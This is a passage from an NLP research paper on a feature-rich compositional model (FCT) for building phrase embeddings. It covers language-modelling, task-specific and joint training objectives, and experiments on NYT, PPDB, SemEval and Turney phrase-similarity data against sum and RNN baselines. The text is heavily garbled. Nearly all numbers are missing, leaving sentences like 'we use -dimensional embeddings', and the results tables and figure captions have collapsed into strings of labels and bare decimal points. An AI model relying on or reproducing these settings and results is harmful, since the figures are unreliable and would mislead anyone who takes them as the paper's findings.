- head tag/cluster — simple: t(w_h), c(w_h) if i ≠ h; compound: <t(w_h), t(w_i)>, <c(w_h), c(w_i)> if i ≠ h
here t(w) is the pos tag of w and c(w) is the word cluster of w (when w_i is a function word, i.e. a preposition or conjunction, there is no need for a smoothed, cluster-based version of the word features, so we directly use the word forms as features, as in the word-form row of the table); h is the position of the head word of phrase p; dis(i − j) is the distance in tokens between w_i and w_j. <f1, f2> denotes the conjunction (i.e. cartesian product) of two feature templates f1 and f2.

fct has two sets of parameters: one is the feature weights (α, b), the other is the word embeddings (e_w). we could directly use the word embeddings learned by neural language models. however, our experiments show that those word embeddings are often not suited for fct. therefore we propose to learn both the feature weights and the word embeddings with the objectives in the next section. moreover, experiments show that starting with the baseline word embeddings leads to better learning results compared to random initializations. therefore, in the rest of the paper, if not specifically mentioned, we always initialize the embeddings of fct with baseline word embeddings learned by mikolov et al. ( b).

training objectives

the speed and flexibility of fct enables a range of training settings. we consider standard unsupervised training (language modeling), task-specific training, and joint objectives.
language modeling

for unsupervised training on large-scale raw texts (language modeling) we train fct so that phrase embeddings – as composed in the previous section – predict contextual words, an extension of the skip-gram objective (mikolov et al., b) to phrases. consider each phrase p_i = (w_{i_1}, ..., w_{i_n}) ∈ p, with w_{i_j} ∈ v, where p is the set of all phrases and v is the word vocabulary. here i is the index of a phrase in set p and i_j is the absolute index of the j-th component word of p_i in the sentence. for predicting the c words to the left and right, the skip-gram objective becomes:

max_{α,b,e_w,e'_w} (1/|p|) Σ_{i=1}^{|p|} [ Σ_{0<j≤c} log p(e'_{w_{i_1−j}} | e_{p_i}) + Σ_{0<j≤c} log p(e'_{w_{i_n+j}} | e_{p_i}) ],
where p(e'_w | e_{p_i}) = exp(e'_w^⊤ e_{p_i}) / Σ_{w'∈v} exp(e'_{w'}^⊤ e_{p_i}),    (3)

where α, b, e_w are parameters of the fct model defined above (the word embeddings e_w become parameters when fine-tuning is enabled). as is common practice, when predicting the context words we use a second set of embeddings e'_w called output embeddings (mikolov et al., b). during training, the fct parameters (α, b) and word embeddings (e_w and e'_w) are updated via back-propagation. e_{p_i} is the phrase embedding defined in eq. (1). w_{i_1−j} is the j-th word before phrase p_i and w_{i_n+j} is the j-th word after p_i. we can use negative sampling based noise contrastive estimation (nce) or hierarchical softmax training (hs) as in (mikolov et al., b) to deal with the large output space. we refer to this objective as the language modeling (lm) objective.

task-specific training

when we have a task for which we want to learn embeddings, we can utilize task-specific training of the model parameters. consider the case where we wish to use phrase embeddings produced by fct in a classification task, where the goal is to determine whether a phrase p_s is semantically similar to a candidate phrase (or word) p_i. for a phrase p_s and a set of candidate phrases {p_i, y_i}_{1}^{n}, where y_i = 1 indicates semantic similarity of p_s and p_i and y_i = 0 otherwise, we use a classification objective:

max_{α,b,e_w} Σ_{p_s} Σ_{i=1}^{n} y_i log p(y_i = 1 | p_s, p_i) = max_{α,b,e_w} Σ_{p_s} Σ_{i=1}^{n} y_i log [ exp(e_{p_s}^⊤ e_{p_i}) / Σ_{j=1}^{n} exp(e_{p_s}^⊤ e_{p_j}) ],    (4)

where e_p is the phrase embedding from eq. (1). when a candidate phrase p_i is a single word, a lexical embedding can be used directly to derive e_{p_i}. when n = 1 for each p_s, i.e., we are working on binary classification problems, the objective reduces to a logistic loss and a bias b will be added. for very large sets, e.g., the whole vocabulary, we use nce to approximate the objective. we call eq. (4) the task-specific (task-spec) objective.

in addition to updating only the fct parameters, we can update the embeddings themselves to improve the task-specific objective. we use the fine-tuning strategy (collobert and weston, ; socher et al., a) for learning task-specific word embeddings, first training fct and the embeddings with the lm objective and then fine-tuning the word embeddings using labeled data for the target task. we refer to this process as "fine-tuning word emb" in the experiments section. note that fine-tuning can also be applied to baseline word embeddings trained with the task-spec objective or the lm objective above.

joint training

while labeled data is the most helpful for training fct for a task, relying on labeled data alone will yield limited improvements: labeled data has low coverage of the vocabulary, which can lead to over-fitting when we update the fct model parameters of eq. (2) and fine-tune word embeddings.
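for concreteness, the task-spec objective in eq. (4) can be computed for a single source phrase as in the following sketch, assuming the candidate set is small enough to use the exact softmax (the paper uses nce for large sets); the names and shapes here are our own illustrative assumptions rather than the authors' code.

```python
import numpy as np

def task_spec_loss(e_ps, e_cands, y):
    # e_ps: composed embedding of the source phrase p_s, shape (d,)
    # e_cands: embeddings of the n candidate phrases/words, shape (n, d)
    # y: label vector with y[i] = 1 for candidates similar to p_s, else 0
    scores = e_cands @ e_ps                            # inner products e_{p_s}^T e_{p_i}
    log_probs = scores - np.logaddexp.reduce(scores)   # log-softmax over candidates
    return -np.sum(y * log_probs)                      # negated eq. (4) term for one p_s
```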
in particular, the effects of fine-tuning word embeddings are usually limited in nlp applications. in contrast to other applications, like vision, where a single input can cover most or all of the model parameters, word embeddings are unique to each word, so a word will have its embedding updated only when the word appears in a training instance. as a result, only words that appear in the labeled data will benefit from fine-tuning and, by changing only part of the embedding space, the performance may be worse overall.

language modeling provides a method to update all embeddings based on a large unlabeled corpus. therefore, we combine the language modeling objective (eq. (3)) and the task-specific objective (eq. (4)) to yield a joint objective. when a word's embedding is changed in a task-specific way, it will impact the rest of the embedding space through the lm objective. thus, all words can benefit from the task-specific training. we call this the joint objective and call the resulting model fct-joint (fct-j for short), since it updates the embeddings with both the lm and task-spec objectives. in addition to jointly training both objectives, we can create a pipeline: first, we train fct with the lm objective; we then fine-tune all the parameters with the task-spec objective. we call this fct-pipeline (fct-p for short).

applications to other phrase composition models

while our focus is the training of fct, we note that the above training objectives can be applied to other composition models as well. as an example, consider a recursive neural network (rnn) (socher et al., ; socher et al., a), which recursively computes phrase embeddings based on the binary sub-tree associated with the phrase using matrix transformations. for the bigram phrases considered in the evaluation tasks, suppose we are given phrase p = (w_1, w_2). the model then computes the phrase embedding e_p as:

e_p = σ(w · [e_{w_1} : e_{w_2}]),    (5)

where [e_{w_1} : e_{w_2}] is the concatenation of the two embedding vectors. w is a matrix of parameters to be learned, which can be further refined according to the labels of the children. back-propagation can be used to update the parameter matrix w and the word embeddings during training. it is possible to train the rnn parameters w with our task-spec or lm objective: given syntactic trees, we can use the rnn (instead of fct) to compute phrase embeddings e_p, which can be used to compute the objective, and then have w updated via back-propagation. the experiments below show results for this method, which we call rnn, with task-spec training. however, while we can train rnns using small amounts of labeled data, it is impractical to scale them to large corpora (i.e. lm training). in contrast, fct easily scales to large corpora.

remark (comparison between fct and rnn): besides efficiency, our fct is also expressive. a common approach to composition, a weighted sum of the embeddings (which we include in our experiments as weighted sum), is a special case of fct with no non-lexical features, and a special case of rnn if we restrict the w matrix of the rnn to be diagonal. therefore, rnn and fct can be viewed as two different ways of improving the expressive strength of weighted sum. the rnns increase expressiveness by making the transformation a full matrix (more complex but less efficient), which does not introduce any interaction between one word and its contexts.
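as a point of comparison with the fct sketch above, eq. (5) corresponds to a composition of roughly the following form; the choice of tanh for the non-linearity σ and the array shapes are assumptions on our part.

```python
import numpy as np

def rnn_compose(e_w1, e_w2, w_mat):
    # eq. (5): compose a bigram with a (possibly tag-specific) matrix transformation
    # e_w1, e_w2: word embeddings, shape (d,); w_mat: parameter matrix, shape (d, 2d)
    concat = np.concatenate([e_w1, e_w2])
    return np.tanh(w_mat @ concat)
```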
fct, on the other hand, can make the transformation for one word depend on its context words by extracting relevant features, while keeping the model linear. (as discussed in the related work section, there do exist more expressive extensions of the rnn that can exploit the interaction between a word and its contexts.) as supported by the experimental results, our method for increasing expressiveness is more effective, because the contextual information is critical for phrase compositions. by comparison, the matrix transformations in rnns may be unnecessarily complicated, are not significantly more helpful in modeling the target tasks, and make the models more likely to over-fit.

parameter estimation

training of fct can be easily accomplished by stochastic gradient descent (sgd). while sgd is fast, training with the lm or joint objectives requires the learning algorithm to scale to large corpora, which can be slow even for sgd.

asynchronous sgd for fct: we use the distributed asynchronous sgd-based algorithm from mikolov et al. ( b). the shared embeddings are updated by each thread based on training data within the thread independently. with word embeddings, the collision rate is low since it is unlikely that different threads will update the same word at the same time. however, adding training of fct to this setup introduces a problem: the shared feature weights α in the phrase composition models have a much higher collision rate. to prevent conflicts, we modify asynchronous sgd so that only a single thread updates both α and the lexical embeddings simultaneously, while the remaining threads only update the lexical embeddings. when training with the lm objective, only a single (arbitrarily chosen) thread can update the fct feature weights; all other threads treat them as fixed during back-propagation. while this reduces the data available for training the fct parameters to only that of a single thread, the small number of parameters α means that even a single thread's data is sufficient for learning them.

we take a similar approach for updating the task-specific (task-spec) part of the joint objective during fct-joint training. we choose a single thread to optimize the task-spec objective while all other threads optimize the lm objective. this means that the αs are updated using the task-specific thread. restricting updates for both sets of parameters to a single thread does not slow training since gradient computation is very fast for the embeddings and αs.

for joint training, we can trade off between the two objectives (task-spec and lm) by setting a weight for each objective (e.g. c1 and c2). however, under the multi-threaded setting we cannot do this explicitly, since the number of threads assigned to each part of the objective influences how the terms are weighted. suppose that we assign n1 threads to task-spec and n2 to lm. since each thread takes a similar amount of time, the actual weights will be roughly c1 = c1′ ∗ n1 and c2 = c2′ ∗ n2. therefore, we first fix the numbers of threads and then tune c1′ and c2′. in all of our experiments that use distributed training, we use a fixed number of threads.

training details: unless otherwise indicated we use -dimensional embeddings, which achieved a good balance between accuracy and efficiency. we use l2 regularization on the weights α in fct as well as on the matrices w of the rnn baselines. in all experiments, the learning rates, numbers of iterations and the weights of the l2 regularizers are tuned on development data.
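the thread-partitioning scheme described above can be sketched as follows; this is only a schematic illustration, the gradient computation is stubbed out, and the parameter container, learning rate, and shard handling are our own assumptions.

```python
import numpy as np
from dataclasses import dataclass
from threading import Thread

LR = 0.025  # illustrative learning rate

@dataclass
class Params:
    word_emb: np.ndarray   # (vocab, d), shared across threads
    alpha: np.ndarray      # (d, k), fct feature weights
    bias: np.ndarray       # (d,)

def fake_gradients(params):
    # stand-in for back-propagation through eqs. (1)-(3); real gradients depend on the data
    return Params(np.zeros_like(params.word_emb),
                  np.zeros_like(params.alpha),
                  np.zeros_like(params.bias))

def sgd_worker(shard, params, owns_alpha):
    # every thread updates the shared embeddings (collisions are rare);
    # only the single designated thread also updates alpha and b
    for _ in shard:
        g = fake_gradients(params)
        params.word_emb -= LR * g.word_emb
        if owns_alpha:
            params.alpha -= LR * g.alpha
            params.bias -= LR * g.bias

params = Params(np.zeros((1000, 50)), np.zeros((50, 10)), np.zeros(50))
threads = [Thread(target=sgd_worker, args=(range(100), params, i == 0)) for i in range(4)]
for t in threads: t.start()
for t in threads: t.join()
```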
we experiment with both negative sampling based nce training (mikolov et al., b) and hierarchical softmax training (hs): nce is used for training the word vec embeddings, the lm objective, and the task-spec objective, while hs is used for the language modeling experiments. we use a window size c = , the default of word vec. we remove types that occur less than times (the default setting of word vec). the vocabulary is the same for all evaluations. for nce training we sample words as negative samples for each training instance according to their frequencies in raw texts. following mikolov et al. ( b), if w has frequency u(w) we set the sampling probability of w to p(w) ∝ u(w)^(3/4). for hs training we build a huffman tree based on word frequency.

pre-trained word embeddings: for methods that require pre-trained lexical embeddings (fct with pre-training, sum (section ), and the fct and rnn models in section ) we always use embeddings trained with the skip-gram model of word vec; specifically, we use the "input embeddings" learned by word vec. the embeddings are trained with nce estimation using the same settings described above.

experiments: language modeling

we begin with experiments on fct for language modeling tasks. the resulting embeddings can then be used for pre-training in the task-specific settings.

data: we use the - subset from the new york times (nyt) portion of gigaword v. (parker et al., ). sentences are tokenized using opennlp (https://opennlp.apache.org/). we removed words with frequencies less than , yielding a vocabulary of , word forms and , , tokens for training word embeddings. this dataset is used both for training baseline word embeddings and for evaluating our models trained with the lm objective. when evaluating the lm task we consider bigram nps in isolation (see the "phrases" column in table 2). for fct features that require syntactic information, we extract the nyt portion of annotated gigaword (napoles et al., ), which uses the stanford parser's annotations. we use all bigram noun phrases (obtained from the annotated data) as the input phrases for the lm objective. a subset of the nyt data from january is withheld for evaluation.

table 2: statistics of nyt and ppdb data ("training pairs" are pairs of a bigram phrase and a word used in the experiments); for the train/dev/test splits, the table reports total pairs, training pairs, and vocabulary size for ppdb xxl, and numbers of phrases, words, and vocabulary size for nyt.

baselines: we include two baselines. the first is to use each component word to predict the context of the phrase with the skip-gram model (mikolov et al., a) and then average the scores to get the probability (denoted word vec). the second is to use the sum of the skip-gram embeddings to predict the scores. training the fct models with pre-trained word embeddings requires running the skip-gram model on the nyt data for two iterations: one for word vec training and one for learning fct. therefore, we also run the word vec model for two epochs to provide embeddings for the baselines.

results: we evaluate the perplexity of language models that include lexical embeddings and our composed phrase embeddings from fct using the lm objective. we use the perplexity computation method of mikolov et al. ( a) suitable for skip-gram models. the fct models are trained by the hs strategy, which can output the exact probability efficiently and was shown by yu and dredze ( ) to obtain better performance on language modeling. since the task-specific experiments below use fct models trained by nce, we also include the results of models trained by nce.
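as a small illustration of the negative-sampling setup described above, p(w) ∝ u(w)^(3/4), the sketch below draws negatives from the smoothed unigram distribution; the 3/4 exponent is the standard word2vec choice, and the helper names and use of raw counts are our own assumptions.

```python
import numpy as np

def negative_sampling_distribution(freqs, power=0.75):
    # unigram counts raised to the 3/4 power, then normalized
    probs = np.asarray(freqs, dtype=float) ** power
    return probs / probs.sum()

def sample_negatives(freqs, k, rng=None):
    # draw k negative word indices for one training instance
    rng = rng or np.random.default_rng(0)
    p = negative_sampling_distribution(freqs)
    return rng.choice(len(p), size=k, p=p)
```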
note that scores obtained from a model trained with hs or nce are not comparable. while the model trained by hs is efficient to evaluate perplexities, nce training requires summation over all words in the vocabulary in the denominator of the softmax to compute perplexity, an impracticality for large vo- cabulary. therefore, we report nce loss with a fixed set of samples for nce trained models. perplexity (hs training) nce loss (nce training) model subset train dev test subset train dev test sum ( epochs) . . . . . . word vec ( epochs) . . . . . . fct (random init, epochs) . . . . . . fct (with pre-training, epochs) . . . . . . table : language model perplexity and nce loss on a subset of train, dev, and test nyt data. ‖λ ‖�‖λ ‖ ‖λ ‖≈‖λ ‖ ‖λ ‖�‖λ ‖ model biological north-eastern dead medicinal new an diversity part body products trial extension fct sensitivity northeastern remains drugs proceeding signed natural sprawling grave uses cross-examination terminated abilities preserve skeleton chemicals defendant temporary species area full sum destruction portion unconscious marijuana new an racial result dying packaging judge renewal genetic integral flesh substances courtroom another cultural chunk signing table : differences in the nearest neighbors from the two phrase embedding models. table shows results for the nyt training data (subset of the full training data containing , phrases with their contexts from july ), de- velopment and test data. language models with fct performed much better than the sum and word vec baselines, under both nce and hs training. note that fct with pre-training makes a single pass over the whole nyt corpus and then a pass over only the bigram nps, and the random initialization model makes a pass over the bigrams twice. this is less data compared to two passes over the full data (baselines), which indicates that fct better captures the context distributions of phrases. qualitative analysis table shows words and their most similar phrases (nearest neighbors) com- puted by fct and sum. we show three types of phrases: one where the two words in a phrase con- tribute equally to the phrase embedding, where the first word dominates the second in the phrase em- bedding, and vice versa. we measure the effect of each word by computing the total magnitude of the λ vector for each word in the phrase. for example, for the phrase “an extension”, the embedding for the second word dominates the resulting phrase embed- ding (‖λ ‖ � ‖λ ‖) as learned by fct. the table highlights the differences between the methods by showing the most relevant phrases not selected as most relevant by the other method. it is clear that words selected using fct are more semantically re- lated than those of the baseline. experiments: task-specific training: phrase similarity data we consider several phrase similarity datasets for evaluating task-specific training. table summarizes these datasets and shows examples of inputs and outputs for each task. ppdb the paraphrase database (ppdb) (gan- itkevitch et al., ) contains tens of millions of automatically extracted paraphrase pairs, including words and phrases. we extract all paraphrases con- taining a bigram noun phrase and a noun word from ppdb. since articles usually have little contribu- tions to the phrase meaning, we removed the easy cases of all pairs in which the phrase is composed of an article and a noun.next, we removed duplicate pairs: if <a,b> occurred in ppdb, we removed re- lations of <b,a>. 
ppdb is organized into parts, ranging from s (small) to xxxl. division into these sets is based on an automatically derived accuracy metric. we extracted paraphrases from the xxl set. the most accurate (i.e. first) , pairs are used for evaluation and divided into a dev set ( pairs) and test set ( pairs); the remaining pairs were used for training. our ppdb task is an extension of mea- suring ppdb semantic similarity between words (yu http://www.cis.upenn.edu/˜ccb/ppdb/ data set input output ( ) ppdb medicinal products drugs ( )semeval <small spot, flect> true <male kangaroo, point> false ( )turney monosyllabic word monosyllable, hyalinization, fund, gittern, killer ( ) ppdb (ngram) contribution of the european union eu contribution table : examples of phrase similarity tasks. ( ) ppdb is a ranking task, in which an input bigram and a output noun are given, and the goal is to rank the output word over other words in the vocabulary. ( ) semeval is a binary classification task: determine whether an input pair of a bigram and a word form a paraphrase (true) or not (false). ( ) turney is a multi-class classification task: determine the word most similar to the input phrase (in bold) from the five output candidates. for the -choice task, the goal is to select the most similar pair between the combination of one bigram phrase, i.e., the input phrase or the swapped input (“word monosyllabic” for this example), and the five output candidates. the correct answer in this case should still be the pair of original input phrase and the original correct output candidate (in bold). ( ) ppdb (ngram) is similar to ppdb, but in which both inputs and outputs becomes noun phrases with arbitrary lengths. and dredze, ) to that between phrases. data de- tails appear in table . phrase similarity datasets we use a variety of human annotated datasets to evaluate phrase se- mantic similarity: the semeval shared task (korkontzelos et al., ), and the noun-modifier problem (turney ) in turney ( ). both tasks provide evaluation data and training data. se- meval task (a) is a classification task to de- termine if a word phrase pair are semantically simi- lar. turney is a task to select the closest match- ing candidate word for a given phrase from candi- date words. the original task contained seven can- didates, two of which are component words of the input phrase (seven-choice task). followup work has since removed the components words from the can- didates (five-choice task). turney ( ) also pro- pose a -choice task based on this same dataset. in this task, the input bigram noun phrase will have its component words swapped. then all the pairs of swapped phrase and a candidate word will be treated as a negative example. therefore, each input phrase will correspond to test examples where only one of them is the positive one. longer phrases: ppdb (ngram-to-ngram) to show the generality of our approach we evaluate our method on phrases longer than bigrams. we extract arbitrary length noun phrase pairs from ppdb. we only include phrase pairs that differ by more than one word; otherwise the task would reduce to eval- uating unigram similarity. similar to the bigram-to- unigram task, we used the xxl set and removed du- plicate pairs. we used the most accurate pairs for development ( , pairs) and test ( , pairs); the remaining , pairs were used for training. as before, we rely on negative sampling to effi- ciently compute the objective during training. 
for each source/target n-gram pair, we sample negative noun phrases as outputs. both the target phrase and the negative phrases are transformed to their phrase embeddings with the current parameters. we then compute inner products between embedding of the source phrase and these output embeddings, and up- date the parameters according to the nce objective. we use the same feature templates as in table . notice that the xxl set contains several subsets (e.g., m, l ,xl) ranked by accuracy. in the experi- ments we also investigate their performance on dev data. unless otherwise specified, the full set is se- lected (performs best on dev set) for training. baselines we compare to the common and ef- fective point-wise addition (sum) method (mitchell and lapata, ). we additionally include weighted sum, which learns overall dimension specific weights from task-specific training, the equivalent of fct with αjk= and bij learned from data. furthermore, we compare to dataset specific mitchell and lapata ( ) also show success with point- wise product (multi) for vsms. however, multi is ill-suited to word embeddings and gave poor results in all our experi- ments. mikolov et al. ( b) show that sum of embeddings is related to product of context distributions because of the loga- rithmic computation in the output layer. baselines: we re-implemented the recursive neural network model (rnn) (socher et al., a) and the dual vsm algorithm in turney ( ) so that they can be trained on our dataset. we also include results for fine-tuning word embeddings in sum and weighted sum with task-spec objectives, which demonstrate improvements over the corre- sponding methods without fine-tuning. as before, word embeddings are pre-trained with word vec. rnns serve as another way to model the com- positionally of bigrams. we run an rnn on bi- grams and associated sub-trees, the same setting fct uses, and are trained on our task-spec objectives with the technique described in section . . as in socher et al. ( a), we refine the matrix w in eq. ( ) according to the pos tags of the component words. for example, for a bigram np like new/adj trial/nn, we use a matrix wadj−nn to transform the two word embeddings to the phrase embedding. in the experiments we have different matrices in total for bigram nps. the number is larger than that in socher et al. ( a) due to incorrect tags in au- tomatic parses. since the rnn model has time complexity o(n ), we compare rnns with different sized embeddings. the first one uses embeddings with dimensions, which has the same size as the embeddings used in socher et al. ( a), and has similar complexity to our model with dimension embeddings. the second model uses the same dimension embed- dings as our model but is significantly more compu- tationally expensive. for all models, we normalize the embeddings so that the l- norm equals , which is important in measuring semantic similarity via inner product. . results: bigram phrases ppdb our first task is to measure phrase simi- larity on ppdb. training uses the task-spec ob- we did not include results for a holistic model as in turney ( ), since most of the phrases (especially for those in ppdb) in our experiments are common phrases, making the vocabulary too large to train. one solution would be to only train holistic embeddings for phrases in the test data, but examination of a test set before training is not a realistic assumption. 
we do not compare the performance between using a single matrix and several matrices since, as discussed in socher et al. ( a), w s refined with pos tags work much better than using a single w . that also supports the argument in this paper, that it is important to determine the transformation with more features. ^ ^ ^ vocabulary sizes m r r o n t e s t s e t( % ) sum rnn rnn fct (a) mrr of models with fixed word embeddings ^ ^ ^ vocabulary sizes m r r o n t e s t s e t( % ) sum rnn rnn fct fct−pipeline fct−joint (b) mrr of models with fine-tuning figure : performance on ppdb task (test set). jective (eq. ( ) with nce training) where data are phrase-word pairs < a,b >. the goal is to select b from a set of candidates given a, where pair sim- ilarity is measured using inner product. we use can- didate sets of size k/ k/ k from the most fre- quent n words in nyt and report mean reciprocal rank (mrr). we report results with the baseline methods (sum, weighted sum, rnn). for fct we report training with the task-spec objective, the joint-objective (fct-j) and the pipeline approach (fct-p). to en- sure that the task-spec objective has a stronger in- fluence in fct-joint, we weighted each training in- stance of lm by . , which is equivalent to setting the learning rate of the lm objective equal to η/ and that of the task-spec objective as η. train- ing makes the same number of passes with the same learning rate as training with the task-spec objec- tive only. for each method we report results with and without fine-tuning the word embeddings on the labeled data. we run fct on the ppdb training data for epochs with learning rate η = . , which are both selected from development set. fig. shows the overall mrr results on differ- fine-tuning mrr model objective word emb @ k sum - - . sum task-spec y . wsum task-spec y . rnn task-spec n . rnn task-spec y . rnn task-spec n . rnn task-spec y . fct task-spec n . fct task-spec y . fct lm y . fct-p task-spec+lm y . fct-j task-spec+lm joint . table : performance on the ppdb task (test data). ent candidate vocabulary sizes ( k, k and k), and table highlights the results on the vocabulary using the top k words. overall, fct with task- spec training improves over all the baseline meth- ods in each setting. fine-tuning word embeddings improves all methods except rnn (d= ). we note that the rnn performs poorly, possibly because it uses a complex transformation from word em- bedding to phrase embeddings, making the learned transformation difficult to generalize well to new phrases and words when the task-specific labeled data is small. as a result, there is no guarantee of comparability between new pairs of phrases and word embeddings. the phrase embeddings may end up in a different part of the subspace from the word embeddings. comparing to sum and weighted sum, fct is capable of using features providing critical con- textual information, which is the source of fct’s improvement. additionally, since the rnns also used pos tags and parsing information yet achieved lower scores than fct, our results show that fct more effectively uses these features. to better show this advantage, we train fct models with only pos tag features, which achieve . / . on mrr@ k with/without fine-tuning word embed- dings, still better than rnns. see section . for a full ablation study of features in table . semi-supervised results: table also high- lighted the improvement from semi-supervised learning. 
first, the fully unsupervised method (lm) improves over sum, showing that improvements in language modeling carry over to semantic similar- ity tasks. this correlation between the lm ob- jective and the target task ensures the success of semi-supervised training. as a result, both semi- supervised methods, fct-j and fct-p improves over the supervised methods; and fct-j achieves the best results of all methods, including fct-p. this demonstrates the effectiveness of including large amounts of unlabeled data while learning with a task-spec objective. we believe that by adding the lm objective, we can propagate the semantic in- formation of embeddings to the words that do not appear in the labeled data (see the differences be- tween vocabulary sizes in table ). the improvement of fct-j over fct-p also in- dicates that the joint training strategy can be more effective than the traditional pipeline-based pre- training. as discussed in section . , the pipeline method, although commonly used in deep learning literatures, does not suit nlp applications well be- cause of the sparsity in word embeddings. there- fore, our results suggest an alternative solution to a wide range of nlp problems where labeled data has low coverage of the vocabulary. for future work, we will further investigate the idea of joint training on more tasks and compare with the pipeline method. results on semeval and turney we evaluate the same methods on semeval and the turney - and -choice tasks, which both provide training and test splits. the same base- lines in the ppdb experiments, as well as the dual space method of turney ( ) and the recursive auto-encoder (rae) from socher et al. ( ) are used for comparison. since the tasks did not provide any development data, we used cross-validation ( folds) for tuning the parameters, and finally set the training epochs to be and η = . . for joint training, the weight of the lm objective is weighted by . (i.e. with a learning rate equal to . η) since the training sets for these two tasks are much smaller. for convenience, we also include results for dual space as reported in turney ( ), though they are not comparable here since turney ( ) used a much larger training set. table shows similar trends as ppdb. one dif- ference here is that rnns do better with dimen- fine-tuning semeval turney model objective word emb test acc ( ) acc ( ) mrr @ k sum - - . . . . sum task-spec y . . . . weighted sum task-spec y . . . . rnn (d= ) task-spec n . . . . rnn (d= ) task-spec y . . . . rnn (d= ) task-spec n . . . . rnn (d= ) task-spec y . . . . dual space - - . . . . dual space - - - . . - rae auto-encoder - . . . . fct task-spec n . . . . fct task-spec y . . . . fct lm - . . . . fct-p task-spec+lm y . . . . fct-j task-spec+lm joint . . . . table : performance on semeval and turney semantic similarity tasks. dual space : our reimple- mentation of the method in (turney, ). dual space : the result reported in turney ( ). rae is the recursive auto-encoder in (socher et al., ), which is trained with the reconstruction-based objective of auto-encoder. sional embeddings on semeval , though at a dimensionality with similar computational complex- ity to fct (d = ), fct improves. additionally, on the -choice task of turney , both the fct and the rnn models, either with or without fine- tuning word embeddings, significantly outperform sum, showing that both models capture the word or- der information. 
fine tuning gives smaller gains on rnns likely because the limited number of training examples is insufficient for the complex rnn model. the lm objective leads to improvements on all three tasks, while rae does not perform significantly bet- ter than random guessing. these results are perhaps attributable to the lack of assumptions in the objec- tive about the relations between word embeddings and phrase embeddings, making the learned phrase embeddings not comparable to word embeddings. . dimensionality and complexity a benefit of fct is that it is computationally effi- cient, allowing it to easily scale to embeddings of dimensions. by contrast, rnn models typi- cally use smaller sized embeddings (d = proved best in socher et al., a) and cannot scale up to large datasets when larger dimensionality embed- dings are used. for example, when training on the ppdb data, the fct with d = processes . instances per ms, while the rnn with the same di- mensionality processes . instance/ms. training an rnn with d = is of comparable speed to fct with d = . figure (a-b) shows the mrr on ppdb for k and k candidate sets for both the sum baseline and fct with a task-spec objective and full features, as compared to rnns with differ- ent sized embeddings. both fct and rnn use fine- tuned embeddings. with a small number of embed- ding dimensions, rnns achieve better results. how- ever, fct can scale to much higher dimensionality embeddings, which easily surpasses the results of rnns. this is especially important when learning a large number of embeddings: the -dimensional space may not be sufficient to capture the semantic diversity, as evidenced by the poor performance of rnns with lower dimensionality. similar trends observed on the ppdb data also appear on the tasks of turney and semeval . figure (c-f) shows the perfor- mances on these two tasks. on the turney task, the fct even outperforms the rnn model us- ing embeddings with the same dimensionality. one possible reason is due to overfitting of the more com- plex rnn models on these small training sets. fig- ure (d) shows that the performances of fct on the -choice task are less affected by the dimensions of embeddings. that is because the composition models can well handle the word order information, rnn rnn rnn dimension of embeddings m r r (% ) sum fct (a) mrr@ k on ppdb dev set dimension of embeddings m r r (% ) rnn rnn rnn sum fct (b) mrr@ k on ppdb dev set rnn rnn rnn dimension of embeddings a c c (% ) sum fct (c) accuracy on the -choice task in turney rnn rnn rnn dimension of embeddings a c c (% ) sum fct (d) accuracy on the -choice task in turney dimension of embeddings m r r (% ) rnn rnn sum fct (e) mrr@ k on turney rnn rnn rnn dimension of embeddings a c c (% ) sum fct (f) accuracy on the semeval figure : effects of embedding dimension on the semantic similarity tasks. the notations “rnn< d >” in the figures stand for the rnn models trained with d-dimensional embeddings. which is critical to solving the -choice task, with- out relying on too much semantic information from word embeddings themselves. figure (e) shows that when the dimensionality of embeddings is lower than , both fct and rnn do worse than the base- line. this is likely because in the case of low dimen- sionality, updating embeddings is likely to change the whole structure of embeddings of training words, making both the fine-tuned word embeddings and the learned phrase embeddings incomparable to the other words. 
the performance of rnn with - dimension embeddings is too low so it is omitted. . experiments on longer phrases so far our experiments have focused on bigram phrases. we now show that fct improves for longer n-gram phrases (table ). without fine-tuning, fct performs significantly better than the other models, showing that the model can better capture the con- text and annotation information related to phrase se- mantics with the help of rich features. with different amounts of training data, we found that wsum and fct both perform better when trained on the ppdb- train fine-tuning mrr model set word emb @ k @ k sum - n . . wsum l n . . fct l n . . sum xxl y . . wsum xxl y . . fct xxl y . . table : results on ppdb ngram-to-ngram task. l set, a more accurate subset of xxl with , phrase pairs. this can be viewed as a low resource setting, where there is limited data for fine-tuning word embeddings. with fine-tuning of word embeddings, fct still significantly beats the other models. all three methods get their best results on the full xxl set, likely because it contains more phrase pairs to al- leviate over fitting caused by fine-tuning word em- beddings. notice that fine-tuning greatly helps all the methods, including sum, indicating that this ngram-to-ngram task is still largely dominated feature set mrr @ k fct . -clus . -pos . -compound . -head . -distance . wsum . sum . table : ablation study on dev set of the ppdb ngram-to-ngram task (mrr @ k). by the quality of single word semantics. therefore, we expect larger gains from fct on tasks where sin- gle word embeddings are less important, such as re- lation extraction (long distance dependencies) and question understanding (intentions are largely de- pendent on interrogatives). finally, we demonstrate the efficacy of different features in fct (table ) with an ablation study (ta- ble ). word cluster features contribute most, be- cause the point-wise product between word embed- ding and its context word cluster representation is actually an approximation of the word-word inter- action, which is believed important for phrase com- positions. head features, though few, also make a big difference, reflecting the importance of syntactic information. compound features do not have much of an impact, possibly because the simpler features capture enough information. related work compositional semantic models aim to build distri- butional representations of a phrase from its compo- nent word representations. a traditional approach for composition is to form a point-wise combina- tion of single word representations with composi- tional operators either pre-defined (e.g. element- wise sum/multiplication) or learned from data (le and mikolov, ). however, these approaches ignore the inner structure of phrases, e.g. the or- der of words in a phrase and its syntactic tree, and the point-wise operations are usually less expressive. one solution is to apply a matrix transformation (possibly followed by a non-linear transformation) to the concatenation of component word represen- tations (zanzotto et al., ). for longer phrases, matrix multiplication can be applied recursively ac- cording to the associated syntactic trees (socher et al., ). however, because the input of the model is the concatenation of word representations, ma- trix transformations cannot capture interactions be- tween a word and its contexts, or between compo- nent words. 
